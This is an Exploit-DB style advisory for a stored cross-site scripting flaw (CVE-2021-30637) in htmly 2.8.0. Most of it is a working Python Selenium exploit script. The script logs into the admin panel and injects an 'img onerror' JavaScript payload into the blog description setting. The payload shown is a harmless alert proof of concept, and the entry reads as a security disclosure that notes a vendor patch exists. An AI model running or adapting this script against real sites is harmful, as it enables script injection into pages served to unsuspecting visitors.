htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)

vendor:

htmly

by:

@nu11secur1ty & G.Dzhankushev

5.4

CVSS

MEDIUM

Stored Cross-Site Scripting (XSS)

CWE

Product Name: htmly

Affected Version From: 2.8.0

Affected Version To: 2.8.0

Patch Exists: YES

Related CWE: CVE-2021-30637

CPE: 2.8.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: None

2021

htmly 2.8.0 – ‘description’ Stored Cross-Site Scripting (XSS)

A stored cross-site scripting (XSS) vulnerability was discovered in htmly 2.8.0. An attacker can exploit this vulnerability to inject malicious JavaScript code into the 'description' field of the 'config.ini' file. This code will be executed in the browser of the victim when they visit the website.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of htmly.

Source

Exploit-DB raw data:

# Exploit Title: htmly 2.8.0 - 'description' Stored Cross-Site Scripting (XSS)
# Authors: @nu11secur1ty & G.Dzhankushev
# Date: 04.15.2021
# Vendor Homepage: https://www.htmly.com/
# Software Link: https://github.com/danpros/htmly
# CVE: CVE-2021-30637

#!/usr/bin/python3

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time


#enter the link to the website you want to automate login.
website_link="http://localhost/htmly/login"

#enter your login username
username="nu11secur1ty"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="user"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="submit"


#browser = webdriver.Safari()	#for macOS users[for others use chrome vis chromedriver]
browser = webdriver.Chrome()	#uncomment this line,for chrome users
#browser = webdriver.Firefox()	#uncomment this line,for chrome users

browser.get((website_link))	

try:
	username_element = browser.find_element_by_name(element_for_username)
	username_element.send_keys(username)		
	password_element  = browser.find_element_by_name(element_for_password)
	password_element.send_keys(password)
	signInButton = browser.find_element_by_name(element_for_submit)
	signInButton.click()
	
	# Exploit .ini
	browser.get(("http://localhost/htmly/admin/config"))	
	browser.execute_script("document.querySelector('[name=\"-config-blog.description\"]').innerText = '</span><img src=1 onerror=alert(1) /><span>'") 
	time.sleep(3)
	browser.execute_script("document.querySelector('.btn.btn-primary').click()")

	print("payload is deployed...\n")
	
except Exception:
	#### This exception occurs if the element are not found in the webpage.
	print("Some error occured :(")